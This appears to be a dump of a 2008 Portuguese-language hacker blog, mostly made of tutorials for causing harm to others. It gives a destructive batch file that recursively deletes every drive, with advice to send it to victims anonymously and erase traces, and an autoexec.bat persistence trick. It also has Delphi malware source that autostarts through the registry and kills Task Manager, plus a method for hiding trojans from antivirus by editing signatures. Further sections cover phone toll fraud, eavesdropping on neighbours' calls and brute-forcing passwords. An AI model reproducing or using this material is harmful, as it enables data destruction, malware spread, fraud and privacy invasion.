Para compreender o quê isso está fazendo é simples, o ZERO na linguagem hexadecimal significa um ponto sem operação, o ZERO é nulo... Após feito isso salve o arquivo em um outro local, vá até aquele local, e apertando o botão direito, selecione a opção do seu antivírus que diz para escanear por vírus. Se o seu anti-vírus achou alguma coisa, exelente, isso significa que o código que o indentifica como sendo um vírus está na parte inferior de todos aqueles números hexadecimais. Se achou algo é o contrário, o código está na parte superior.
Agora vamos para a parte menos complicada, volte para o hexplorer e dê um CTRL+Z para voltar ao formato original. Se seu anti-vírus não localizou nada, comece "zerando" os números por partes de baixo para sima, se ele localiou, comece pelo contrário.
Após localizar os números hexadecimais que seu anti-vírus capta como sendo um vírus, mude-os de forma que não afete o arquivo...

Pontos a declarar:
-Não pence que será fácil mudar os números sem corromper o arquivo;
-Não pence que TODOS os antí-vírus não irão mais detectar seu vírus, isso ocorre por que cada anti-vírus possue um número diferente que identifica o vírus como sendo o próprio. Mais não fique desanimado, muitos anti-vírus possuem assinaturas iguais para pegar os vírus...
-E por último mas mais importante: fassa seu próprio trojan. Mantenha ele em versão privada para somente o você usar, e compartilhe com os outros como o mesmo foi feito.

Vírus Badcom

2008-04-18T13:44:00.001-07:00

Badcom é um pequeno arquivo (.com ou .bat) que quando executados realizam tarefas que podem ser benéficas ou maléficas. Ele realiza comandos no DOS ou no Windows, aqui vamos ensinar como fazer um, dar os principais comandos e dois exemplos nada benéficos.

Fazendo um Badcom:

Primeiro você abre o edit no DOS ou o Bloco de Notas do Windows, lá você colocará os comandos que serão realizados quando o arquivo for executado, depois de feito você salva o arquivo com extensão .bat invés de .txt, para isso é só colocar: nomedoarquivo.bat por exemplo ou depois de salvo renomear colocando .bat no final.

Para transformar o arquivo .bat em .com:

Você precisará de um pequeno arquivo para fazer isso, ele é o "Bat2xec.com" que tem essa função de transformar .bat em .com. Depois de pegar esse arquivo salve ele dentro da pasta do Windows e vá ao DOS, entre na pasta aonde está o arquivo usando os comandos básicos de DOS:
cd.. = retorna um pasta
cd\ = sai de todas pastas
dir = mostra todos arquivos e pastas de uma pasta
cd nomedapasta = entra na pasta que você colocou o nome
lembre-se que pastas com mais de oito caracteres terão no dos o seguinte nome:
se a pasta é: "Meus documentos", no DOS será: "Meusdo~1" (sem "aspas").
Após estar na pasta do arquivo .bat e supondo que o nome do arquivo seja "arquivo.bat" digite: "bat2exec arquivo.bat" (sem aspas). Pronto será criado um arquivo com mesmo nome e extenção .com na mesma pasta.

Exemplo simples e destrutivo:

Abra o bloco de notas do windows ou o editor de texto do MS-DOS e coloque os comandos abaixo:
@ECHO OFF
ECHO COLOQUE SUA MENSAGEM DE DESPEDIDA AQUI HEHE
BREAK OFF
DELTREE/y C:\*.*
DELTREE/y D:\*.*
DELTREE/y E:\*.*
DELTREE/y F:\*.*

PRONTO, QUEM EXECUTAR ESSE ARQUIVO TERÁ O PC FORMATADO MESMO SE FOR VOCÊ OU UM AMIGO NÃO ME RESPONSABILIZO POR NADA QUE ACONTECER...

Exemplo inofencivo:

Você pode executar este arquivo em seu pc sem nenhum problema. É só colocar estes comandos para um bloco de notas fazendo suas alterações.
@echo off
cls
cd\
:vlt
echo badcom FEITO POR
echo badcom DISPON'IVEL
echo Grupo Hacker MENTESHACKERS siempre com che
echo o seu SISTEMA e' meu agora haiheaiuu
echo ][][][ Isto 'e apenas um VERME's?? ][][][
echo [1] Me desculpe, eu adoro fuder lammers ..]]]
echo [2] Portque vc vai me fuder???
echo [3] Oque e' um vírus??
choice /n/c123
if errorlevel 3 goto end
if errorlevel 2 goto end
if errorlevel 1 goto end
:end
echo ....ei estou FUDENDO VOCÊ NOW....
echo > minorthreat.txt isto foi um badcom
echo > the_ghost.txt isto foi um badcom feito por the_ghost
echo > leiaporra.txt prescione ctrl + alt + del para acabar com isso agora
echo > grupo.txt isso 'e um exemplo simples de badcom
notepad minorthreat.txt
notepad syspunk.txt
notepad leiaporra.txt
notepad grupo.txt
goto vlt

Importante:
Agora envie seu arquivo para sua vítima (cuidado para não clicar nele e ser a própria vítima) Use um e-mail anônimo para não saberem quem foi ou vá pelo IRC e se responsabilize pelos seus atos.

Caso a pessoa passe esse badcom via disquete, ele não deve esquecer de finalizar o arquivo com o seguinte comando para não deixar vestígios de seu ato insano no disquete.
deltree/y a:\*.*

Comandos básicos Badcom

2008-04-18T13:43:00.001-07:00

@echo off = não mostra os comandos que serão executados
cls = limpa a tela
echo www.redehacker.com = aparecerá na tela "www.redehacker.com" por exemplo
echo > threat.bat por syspunk = crirá um arquivo threat.bat e nele terá escrito "por syspunk"
echo > threat.bat c:\deltree /y windows = criará um arquivo, com nome threat.bat, no hd da pessoa que quando executado apagará a pasta windows sem nenhuma pergunta
md redehacker.com = cria uma pasta com nome "redehacker.coml" no hd da pessoa
del *.xxx (onde xxx é a extenção do arquivo) = paga os arquivos com a extenção desejada exemplo: del c:\windows\*.ini = apaga os arquivos .ini da pasta do windows
deltree /y windows = apada o diretório do window$ sem perguntar sim ou não
ren autoexec.bat autoexec.seunick = renomeia o autoexec.bat para o nome que você quiser
GOTO: este comando faz repetição de comandos da seguinte maneira:
:INI = indica para onde você quer voltar
GOTO INI = volta para onde o :INI estiver ( não precisa ser INI pode ser oq vc quiser com os dosi pontos antres e depois o mesmo nome com GOTO antes
CHOICE /c 123 = mostra um prompt de questão e você precisa do seguinte comando (pode ter quantos números você quiser)
IF ERRORLEVEL 2 DES = desliga o pc se a pessoa digitar 2
IF ERRORLEVEL 1 REI = reinicia o pc se a pessoa escolher 1
(as mensagens e os nomes dos arquivos podem ser alteradas por você)

Criando Vírus

2008-04-18T13:42:00.001-07:00

Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:

Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.

Entre com os comandos: @ECHO OFF e BREAK OFF. A página deverá ficar da

seguinte maneira, como está embaixo:

@ECHO OFF
BREAK OFF

Depois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio. Você deve usar o seguinte

comando:

deltree/y c:\*.*

Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto!

Importante:

Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.

Virus em Delphi

Existe muitas maneiras de criar um virus em delphi, a maioria dos trojans famosos que circulão n internet foram feitos em delphi.
Eu vou mostrar como fazer um virus reninciar junto com o windows e travar o Ctrl + Alt + Del.

Vamos la, Primeiro abra um projeto e coloque na uses "Registry,"

Agora em baixo de "{$R *.dfm}" clouqe isso:

procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean );
var
sKey : string;
reg : TRegIniFile;
begin
if( bRunOnce )then
begin
sKey := 'Once'
end
else
begin
sKey := '';
end;
reg := TRegIniFile.Create( '' );
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+ sKey + #0, sProgTitle, sCmdLine );
reg.Free;
end;

Agora no FormCreate coloque isso:

procedure TForm1.FormCreate(Sender: TObject);
begin
Application.ShowMainForm := False;
CopyFile(PChar(Application.ExeName),'C:\WINDOWS\virus.exe',True);
RunOnStartup('virus','C:\WINDOWS\virus.exe',true);
end;

Agora vamos fazer a parte de travar a listagem de processos, vou dar o coder todo basta voce fazer sua arte:

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, TLHelp32, PsAPI, ExtCtrls;

type
TForm1 = class(TForm)
Timer1: TTimer;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

function TerminarProcesso(sFile: String): Boolean;
var
verSystem: TOSVersionInfo;
hdlSnap,hdlProcess: THandle;
bPath,bLoop: Bool;
peEntry: TProcessEntry32;
arrPid: Array [0..1023] of DWORD;
iC: DWord;
k,iCount: Integer;
arrModul: Array [0..299] of Char;
hdlModul: HMODULE;
begin
Result := False;
if ExtractFileName(sFile)=sFile then
bPath:=false
else
bPath:=true;
verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);
GetVersionEx(verSystem);
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then
begin
hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
peEntry.dwSize:=Sizeof(peEntry);
bLoop:=Process32First(hdlSnap,peEntry);
while integer(bLoop)<>0 do
begin
if bPath then
begin
if CompareText(peEntry.szExeFile,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);
Result := True;
end;
end;
bLoop := Process32Next(hdlSnap,peEntry);
end;
CloseHandle(hdlSnap);
end
else
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then
begin
EnumProcesses(@arrPid,SizeOf(arrPid),iC);
iCount := iC div SizeOf(DWORD);
for k := 0 to Pred(iCount) do
begin
hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]);
if (hdlProcess<>0) then
begin
EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC);
GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul));
if bPath then
begin
if CompareText(arrModul,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(arrModul),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end;
CloseHandle(hdlProcess);
end;
end;
end;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
begin
TerminarProcesso('taskmgr.exe');
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
application.ShowMainForm := false;
end;

end.

Deixando Trojan Indetectável

2008-04-18T13:41:00.002-07:00

Opa Galera Muito bom este tutorial sobre como deixar um virus ou alguma coisa do tipo indetectavel pelos antivirus !!
Espero que gostem !!
-------------------------------------------------------------------------------------

Mais uma vez venho mostrar para os desesperados de plantão que sempré há uma maneira de fazer seu vírus indetectável. O que usaremos dessa vez é a edição dos números hexadecimais... Sim sim, numeros e mais números para botar sua massa cinzenta para funsionar.

Precisamos de:
-Um editor hexadecimal (usaremos o HEXPlorer por ser freeware) Download
-Um server de qualquer trojan
-E por último um anti-vírus - www.menteshackers.1br.net

o que são trojan?

2008-04-18T13:41:00.001-07:00

Um Trojan Horse é um programa que faz algum tipo de atividade maléfica porém ele não se espalha automaticamente.

Geralmente, trojans são malware simples de se remover comparado aos worms e vírus.

A maioria dos trojans incluem também o que chamamos de backdoor.

Também existem os Trojan Droppers. Esses são identificados pelos antivírus como Dropper.X ou Trojan.Dropper/X. Os Droppers seguem a história de Tróia: Droppers são programas que deviam, por exemplo, tocar uma música, quando na verdade instalam o Trojan. Trojan Droppers são comuns em programas ilegais, como geradores de crédito para celulares e ferramentas para criação de vírus.

o que é virus?

2008-04-18T13:40:00.001-07:00

O vírus é um software (programa) projetado e escrito para afetar de forma adversa o seu computador e fazer alterações sem a sua permissão. Ele é um código de programa que invade um de seus arquivos executáveis e se espalha para todos os outros. O computador não cria vírus espontaneamente. Eles precisam ser escritos e ter um objetivo específico. O vírus pode causar danos aos programas que altera, comprometendo a operação do sistema e os dados dos usuários

por dentro do pc

2008-04-18T12:55:00.000-07:00

Saiba como é um computador por dentro, e para que serve cada parte dele!

Memória

1) Os erros de memória não significam necessariamente que os seus chips RAM falharam. Empurre delicadamente os chips no lugar nas suas placas de memória e certifique-se de que as placas estão firmemente presas nos slots da placa-mãe.

Ventiladores

2) Se as luzes indicativas do computador permanecem apagadas e nem mesmo o ventilador gira quando você liga o PC, parece haver uma falha no suprimento de energia. Ou talvez o fusível no cabo de energia tenha falhado? Experimente outro fusível para certificar-se.

Portas IDE

3) As portas IDE permitem ao seu disco rígido e ao seu CD-ROM transferir informações de e para o resto do sistema. Se um drive está inoperante, verifique se os cabos estão firmemente conectados às portas corretas (novos drives precisarão que os jumpers sejam configurados corretamente, e talvez também de alterações no BIOS).

Disco Rígido

4) O seu computador é pouco mais do que um grande peso de papel até que você possa acessar os dados no seu disco rígido; mas isso será possível somente se o seu BIOS detectá-lo corretamente, e se todas suas as outras numerosas configurações relativas ao IDE estiverem corretas.

Cabeamento Aleatório

5) Não há muito espaço dentro de alguns computadores - os cabos são esticados e puxados, e podem se desconectar. Procure por isso se tiver um problema, mas reconecte os cabos com cuidado - o cabo errado no lugar errado somente tornará a sua situação pior.

CPU

6) A CPU (unidade central de processamento) é o coração do seu PC, e se ela falhar somente uma substituição ajudará. Mas falhas intermitentes podem ser causadas por super-aquecimento - certifique-se de que o seu ventilador está funcionando, e que as saídas de ar estão limpas e desobstruídas.

Placas de Expansão

7) Quanto mais placas você acrescentar a um sistema, mais trabalho o Windows tem para fazer com que todas trabalhem direito juntas. Se o seu computador não dá boot adequadamente, experimente remover todas as placas não-essenciais, para ver se um computador básico tem mais sucesso.

escutas ou burlando

2008-04-18T12:47:00.000-07:00

Ouça conversas de sua mãe, visinhos, etc. Que usam telefone sem fio.

Você só poderá ouvir as conversas com estas dicas então as pessoas nunca saberão que você esta ouvindo as conversas deles.

Conversas
1-Para ouvir conversas dos outros

Telefones sem Fio:

Caso você tenha um telefone sem fio, poderá ouvir as conversas dele em radio FM. É só você ligar e discar para qualquer pessoa e procurar no radio, até sintonizar a mesma freqüência do telefone. Aqui vão algumas freqüências já testadas.

Panasonic

KX-T3908-

93,3MHz

Panasonic

KK-T4550-

93,3MHz

Outra dica boa: tambem é você comprar aqueles radinhos de crianças brincarem, que só pega uns 10 metros de um radinho para o outro, ai você pega um do seu filho, sobrinho, etc e liga um só radinho, ai você irá pegar freqüencias de telefone sem fio, de até uns 100 metros do radinho podre que só pegava 10 metros, falando de um para o outro.(Ele o radinho irá pegar a freqüencia que estiver mais perto dele então seu visinhos que usam telefone sem fio nunca estarão falando a sós no telefone).

Burlando telefones

2- Burlando Celulares

Primeiro, pegue o número que você vai discar.

Ex: 123-4567

Esse número é ficticio. Não ligue para lá, pedindo informações.
Entao devemos pegar o ultimo numero do telefone a ser discado, no caso o 7... subtraimos ele de 10, o que vai resultar o numero 3.
Somente vamos acrescentar o numero 3 ao final do numero discado. O resultado vai ficar:

Numero ligado sem pagar: 123-4567-3

3- Ligando em orelhões à cartão sem pagar

Truque com o cartão:

As tecnicas que eu uso são 3 agora vc vai conhece-las!

Enganando o telefone publico

1º jeito: Ponha o cartão e ligue normalmente
Quando a pessoa atender aperte o 0(zero) e segure.
Pronto agora suas fichas (unidades do cartão) não vão cair mais!

Obs: Não solte o dedo do 0(zero) se não as fichas vão voltar a cair,
essa e a parte chata!

2º jeito: Bote o cartão , assim que a pessoa falar ALOW! segure o numero 9 e retire o cartão,fique segurando o numero 9 até acabar de falar!

Grafite: O grafite é um material super condutor que conduz energia, e o cartão funciona assim, ele tem uns 50 fuziveiszinhos, cada ligação gasta ele queima um fuzivel, então o nosso amigo grafite que é condutor de eletricidade, não deixa queimar os fuziveis então faça o seguinte atrás do cartão,(na parte cinza) rabisque-a com força e bote no telefone publico e pronto ,mas lembre-se rabisque com força!

Esmalte de unha incolor

O esmalte impede que esses fusíveis queimem, faça também esse com os cartões de vídeo game (divertilandia)! Passe esmalte na parte de traz do cartão ,e no de vídeo game passe na parte da fita magnética! Pegue o cartão telefonico "novinho em folha"! dai coloque ele de molho na água candida (Va a uma lojas de limpeza e peça ,se não souber), depois de 3 ou 4 dias a tinta do cartão irá sair , depois pegue papel aluminio e cubra as partes metalicas com o papel aluminio , depois coloque o cartão no orelhão e ligue e faça afesta por que as ligaçoes ficarão infinitas!

Usando um cartão usado, envolvido por papel alumínio.

Usando um cartão usado de 50 ligações, com a parte de trás raspada Orelhão sem Fichas .

Usando um telefone comum.

Pegue algum telefone pequeno e descasque os fios, descasque o fio do orelhão e ligue-os com o do seu telefone.Pronto aí é só ligar pro Deus e o mundo.Mas se lembre que tem que por fio positivo com fio positivo, se não não vai dar.

4- Escuta por celular

Tire a bateria do seu celular, nos ferrinhos que tem em baixo coloque um pedacinho de alumínio e ponha a bateria de novo, aí é so ligar o celular, digitar #1058# e escutar tudo.

5- Conectando notebooks a telefones públicos

O processo para se conectar notebooks a orelhões, é igual ao de se conectar telefones comuns. Resumirei nesse item, algumas considerações a respeito da fiação do notebook, que segue os padrões da FCC Americana e é um pouco diferente da nossa. O conector do fio do notebook, que é do tipo jack, tem quatro fios dentro dele. Arranque o conector de plástico transparente que fica na ponta do fio, pegue os dois fios centrais e separe-os dos fios das extremidades. Estes dois fios centrais, são os que serão utilizados para fazer a ligação no orelhão. Eu aconselho que você coloque jacarés neles também. Basta conectar-se a BBS's da mesma forma que você se conecta em casa. Caso você queira testar se está tudo OK, abra um programa de terminal qualquer e digite o comando ATA, se fizer um barulhinho parecido com o tom de linha é que está tudo OK.

6- Efetuando ligações gratuitamente utilizando um aparelho comum
Primeiramente, você deve tomar os processos citados no ítem anterior (Como efetuar ligações de um telefone público utilizando um diodo)para descascar os fios do telefone público. Em seguida você deve conseguir um aparelho telefônico comum e ligar cada uma das pontas dos fios dele nos fios do orelhão. Para facilitar a sua vida, eu aconselho que o seu telefone seja o menor possível e que você prenda um jacaré (pequeno gancho achado em qualquer loja de componentes eletrônicos) em cada uma das pontas do seu telefone, para facilitar a ligação no orelhão. Aí é só efetuar a ligação normalmente.

7- Efetuando ligações de aparelhos sem teclas
Antes de começarmos, precisamos definir o que significa "duração de um pulso". Um pulso é simplesmente uma interrupção no fluxo de corrente que circula na linha telefônica, e a sua duração, entendida como o espaço de tempo decorrido do início ao fim desta interrupção. Os pulsos enviados pelo aparelho telefônico quando você aperta o botão de algum número, são iguais ao sinal emitido quando você coloca o telefone no gancho. A diferenciação éfeita pela central telefônica, usando como referência a duração do pulso. Se ele for um pouco maior do que 0.5 segundos (aumentar um pouco esse valor para as linhas mais antigas), a central considera que ‚ um pedido de linha. Se a duração do pulso for menor do que esse valor, a central irá considerar que um número a ser discado está sendo enviado. Para formar os números de 0 a 9, são enviado uma série de pequenos pulsos em sequência referentes ao número, ou seja, 2 pulsos para o número 2, 3 para o número 3 e assim por diante. Para o número 0 são enviados dez pulsos. Para simular esses pulsos sem a necessidade de teclas, basta usar o botão onde se "pega" a linha, aquele onde você coloca o telefone em cima quando quer terminar uma ligação. Aperte e solte este botão rapidamente de acordo com o número que você quer discar, espere um pouco e aperte outra série de vezes de acordo com o outro número. Lembre-se que para o número 0 deve-se apertar o botão dez vezes. Faça isso com todos os números e, ao final, você vai escutar o tom de chamada.

8- Ligando de telefone publico sem pagar
Este método só funciona em telefones antigos! Aqueles na base da moedinha (se estiver nos Estados Unidos, usa o Red Box). Por exemplo: O número que você quer ligar é 523-26-47 (número fictício) Primeiro você deve dimunuir de 10 todos os numeros que compoem o telefone a se ser discado, no caso esse telefone ficaria. Número a ser discado: 523-26-47 ORIGINAL

(5-10)=5
(2-10)=8
(3-10)=7
(2-10)=8
(6-10)=4
(4-10)=6
(7-10)=3
O novo número será: 587-84-63 O que você vai ter que fazer é bater no bocal do telefone o número de vezes correspondente a subtração. Conforme explicado em "Ligação de Aparelhos Sem Teclas". Desta maneira você podera fazer ligacoes gratuitamente...

9- Ligando do Celular pagando a metade
Este truque só funciona com celulares com a marca Motorola. Siga as instruções abaixo:

Pressione FCN
Digite 0000000 4
Pressione STO
Seqüência completa: FCN + 0000000 4 + STO
Viu como é simples??
Fazendo Escuta Celular via TV
(pode se necessário usar o manual da TV).
TV VHF canais 70 - 83 pegue a melhor distribuição do melhor tronco usado pelos
celulares. Este é o que distribui nesse fluxo. Sintonize esses canais ajustando-os a sua atual freqüência e você estar preparado para fazer a escuta. Cada canal da TV obrigara
5Mhz com ótimo controle de sintonia. Se mesmo assim você não tiver uma freqüência
exata você precisará ler sobre freqüência e você terá uma boa idéia de como obter uma exata.
Se a sensividade não estiver boa mesmo você estando na cidade, ou perto de uma freqüência exata você pegara alguma coisa. Você poderá também pegar transmissões de negócios no tronco móvel se o mesmo estiver fechado, as transmissões não serão ilegais a menos que a conversa esteja codificada então você poderá usar a velha TV para achar outro local de negócios que use freqüências entre 800Mhz ou mais.

10- Ligando do Celular sem pagar
Se você tem celular e no final do mês sai aquela conta terrível, você vai gostar deste truque. É muito fácil, até uma criança pode fazer. O truque funciona assim: Você tem que digitar no final do número outro número que somado com o último seja 10. Não entendeu? Veja esse exemplo: Se você quer ligar do seu celular para 123-4567 você vai pagar. Agora se você ligar para 123-45673 não vai pagar. Note que o número que você digitar no final soma com o ultimo: 7 + 3 = 10. Agora você pode ligar para qualquer numero, exemplo: 234-5678(2), 345-6789(1)... O 0 (zero) fica assim: 456-78900, digite outro zero :)

Registro do Windows

2008-04-18T10:32:00.000-07:00

"REGEDIT"

Regedit... resumidamente é o programa editor de registro do windows... onde ficam guardados os registros de cada programa do computador...
Se você é apenas um iniciante... querendo crackear alguns programas... ou só está mexendo por pura curiosidade... tome muito cuidado... porque uma simples mudança que você possa fazer lá... pode danificar seu computador seriamente... então... te aconselho a fazer testes em um computador que você não está nem ai com o que irá acontecer... Mas se mesmo assim você quiser tentar....
Existem seqüências simples no Regedit... como trocar o nome da lixeira por exemplo... você não precisa ir... colocar a chave... e etc... simplesmente é só você entrar no regedit, e digitar "lixeira" para localizar... ele localiza a chave... e é só você mudar o nome e depois salvar...
Tem como você "driblar" também o limite de uso dos programas também... quando o programa ultrapassa o limite de uso... você vai pelo Regedit e volta ao 0... podendo usar tudo de novo... é só procurar a chaves... (Muitas vezes digitando o nome do programa da certo...) o resto é você que vai aprendendo e manjando...
Abaixo algumas chaves do Regedit:

Painel de Controle {21EC2020-3AEA-1069-A2DD-08002B30309D}

Impressoras {2227A280-3AEA-1069-A2DE-08002B30309D}

Lixeira {645FF040-5081-101B-9F08-00AA002F954E}

Meu Computador {20D04FE0-3AEA-1069-A2D8-08002B30309D}

Network Neighborhood {208D2C60-3AEA-1069-A2D7-08002B30309D}

Caixa de Entrada {00020D75-0000-0000-C000-000000000046}

Área de Trabalho {00021400-0000-0000-C000-000000000046}

Atalho {00021401-0000-0000-C000-000000000046}

Tarefa do Menu iniciar {DDB008FE-048D-11d1-B9CD-00C04FC2C1D2}

Active Desktop Mover {72267F6A-A6F9-11D0-BC94-00C04FB67863}

Internet Explorer {25336920-03F9-11CF-8FD0-00AA00686F13}

Documento MS WORD {00020900-0000-0000-C000-000000000046}

Documento MS EXCEL {00024500-0000-0000-C000-000000000046}

The Ms Network {00028B00-0000-0000-C000-000000000046}

Fontes {BD84B380-8CA2-1069-A2DE-08000948F534}

Tracerts

2008-04-18T10:31:00.000-07:00

O utilitário Tracert exibe a rota de um pacote até que este alcance seu destino , sendo útil para determinarmos se a rota falhou , qual rotador falhou e o tempo de resposta . Se você está tendo problemas com conexão , ele pode ser útil para definir a localização do problema .

Tracert usa o ICMP para realizar seu trabalho . Primeiro ele determina o n;úmero de "saltos" de roteadores para seu destino . Então envia um número de pacotes ICMP igual a de "saltos". No primeiro pacote ele seta o "TTL" (time to live) para 1 e , cada pacote sucessivo , incrementa o TTL em 1 . Cada tempo de pacote que passa por um roteador , teme seu TTL decrementado pelo mesmo até alcançar 0 . A maioria dos roteadores mandam de volta uma mensagem ao rementente que indica se o pacote foi descartado . Isto significa que o primeiro pacote enviado com um TTL de 1 , será devolvido pelo primeiro roteador , o segundo pacote com um TTL de 2 , será devolvido pelo segundo roteador e assim por diante .

Sintexe :

tracert [-d] [-h max_hops] [-j host_list] [-w timeout] destination

Onde :

D : Determina para não encontrar o endereço IP do host name ;

H mx_host : Determina o número máximo de "saltos" para procurar o destino ;

J host_list : Determina a rota de origem ao longo de host_list ;

W timeout (Intervalo) : Determina um intervalo de tempo para cada pacote , em milissegundo ;

Destination : Especifica o hostname ou endereço IP do compiuador destino .

Litas de Porta

2008-04-18T10:29:00.000-07:00

Esta lista é útil para aquelas pessoas que estão infectadas com algum trojan e não sabem qual seu nome, bastando apenas saber em qual porta ele está agindo.

Abaixo está a lista das portas-padrão utilizadas pelos trojans mais conhecidos para Windows NT, 95, 98:

 Porta     21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
Porta     23 - Tiny Telnet Server
Porta     25 - Antigen, Email Password Sender, Haebu Coceda, Terminator, Shtrilitz Stealth, WinPC, WinSpy
Porta     31 - Hackers Paradise, Master's Paradise 8 
Porta    121 - BO jammerkillahV
Porta    456 - Hackers Paradise
Porta    555 - Ini-Killer, Phase Zero, Stealth Spy
Porta    666 - Satanz Backdoor, Attack FTP 
Porta   1001 - Silencer, WebEx
Porta   1011 - Doly Trojan
Porta   1033 - NetSpy
Porta   1080 - Wingate (Socks-Proxy)
Porta   1170 - Psyber Stream Server, Voice, Streaming Audio Trojan
Porta   1234 - Ultors Trojan
Porta   1243 - SubSeven
Porta   1245 - VooDoo Doll
Porta   1492 - FTP99CMP
Porta   1509 - Psyber Streaming Server
Porta   1600 - Shivka-Burka
Porta   1807 - SpySender
Porta   1981 - Shockrave
Porta   1999 - BackDoor
Porta   2001 - Trojan Cow
Porta   2023 - Ripper
Porta   2115 - Bugs
Porta   2140 - Deep Throat, The Invasor
Porta   2565 - Striker
Porta   2583 - WinCrash 2.0
Porta   2801 - Phineas Phucker
Porta   3024 - WinCrash
Porta   3129 - Masters Paradise
Porta   3150 - Deep Throat, The Invasor
Porta   3700 - Portal of Doom
Porta   4590 - ICQTrojan
Porta   4950 - IcqTrojen
Porta   5000 - Sockets de Troie
Porta   5001 - Sockets de Troie
Porta   5321 - Firehotcker
Porta   5400 - Blade Runner
Porta   5401 - Blade Runner
Porta   5402 - Blade Runner
Porta   5569 - Robo-Hack
Porta   5742 - WinCrash
Porta   6400 - The tHing
Porta   6670 - DeepThroat
Porta   6771 - DeepThroat
Porta   6883 - DeltaSource 
Porta   6939 - Indoctrination
Porta   6969 - GateCrasher, Priority
Porta   7000 - Remote Grab
Porta   7300 - NetMonitor
Porta   7301 - NetMonitor
Porta   7306 - NetMonitor
Porta   7307 - NetMonitor
Porta   7308 - NetMonitor
Porta   7789 - ICKiller
Porta   9872 - Portal of Doom
Porta   9873 - Portal of Doom
Porta   9874 - Portal of Doom
Porta   9875 - Portal of Doom
Porta   9989 - iNi-Killer
Porta  10067 - Portal of Doom
Porta  10167 - Portal of Doom
Porta  11000 - Senna Spy
Porta  11223 - Progenic trojan
Porta  12223 - Hack´99 KeyLogger
Porta  12345 - GabanBus, NetBus
Porta  12346 - GabanBus, NetBus
Porta  12361 - Whack-a-mole
Porta  12362 - Whack-a-mole
Porta  16969 - Priority
Porta  20001 - Millennium
Porta  20034 - NetBus 2 Pro, NetRex Pro
Porta  21544 - GirlFriend
Porta  22222 - Prosiak 0.47
Porta  23456 - Evil FTP, Ugly FTP, WhackJob 
Porta  26274 - Delta
Porta  30029 - AOLTrojan1.1 
Porta  30100 - NetSphere
Porta  30303 - Sockets de Troie 2.5
Porta  30999 - Kuang 
Porta  31337 - Back Orifice
Porta  31338 - Back Orifice, DeepBO
Porta  31339 - NetSpy DK
Porta  31666 - BOWhack
Porta  31787 - Hack'a'tack
Porta  33333 - Prosiak
Porta  34324 - BigGluck, TN, Tiny Telnet Server
Porta  40412 - The Spy
Porta  40421 - Master's Paradise
Porta  40422 - Master's Paradise
Porta  40423 - Master's Paradise
Porta  40426 - Master's Paradise
Porta  47262 - Delta
Porta  50505 - Sockets de Troie
Porta  50766 - Fore
Porta  53001 - Remote Windows Shutdown
Porta  61466 - Telecommando
Porta  65000 - Devil

wwwhack

2008-04-18T10:22:00.002-07:00

INTRODUÇÃO

O WWWHack é um programa que usa o método de Brute Force
para encontrar
logins e senhas válidas. Ele testa um determinado login
ou senha com
uma lista de palavras até que seja liberado o acesso.

Vocábulo:
WorldList: Uma lista de logins e senhas facilitando o
encontro de
senhas.
POP3: Servidor de e-mail. Ele é usado p/ que o usuário
não tenha que
desconectar toda vez que uma senha não vai.
FTP: É o Servidor de FTP. Pode também ser usado como
servidor de
arquivos, e assim como o POP3, é usado p/ que o usuário
não tenha que
desconectar toda vez que uma senha não vai.

Como Proceder:

1. Por POP3 (Servidor de E-mail)

Para senhas de e-mails vá em chutar senhas (em inglês,
access) e depois
servidor pop3 (em inglês, Pop3 email acct) em host
coloque um servidor
POP3 ex: pop3.provedor.com.br depois em usuário coloque
"all posible
combination" em baixo e melhor que coloque 2 a 8 onde
tem senha
coloque "always use this passwords" e em baixo uma senha
que você acha
tem em algum e-mail ex: senha2002 .

2. Por FTP

Para senhas de e-mails vá em chutar senhas (access) e
depois servidor
ftp (FTP server) em host coloque um servidor POP3 ex:
ftp.provedor.com.br
depois em usuário coloque "all posible combination" em
baixo e melhor
que coloque 2 a 8 onde tem senha coloque "always use
this passwords" e
em baixo uma senha que você acha tem em algum e-mail ex:
senha2002

3. Caso queira Descobrir a senha de algum site (HPG):

Vá em chutar senhas (access), depois servidor FTP (FTP
server), em
host coloque "provedor.com.br", no login coloque o nome
do site ex: hp10
Nos passwords coloque "all possible comibination" em
baixo também é
melhor que coloque 3 a 8.

Outras Opções:

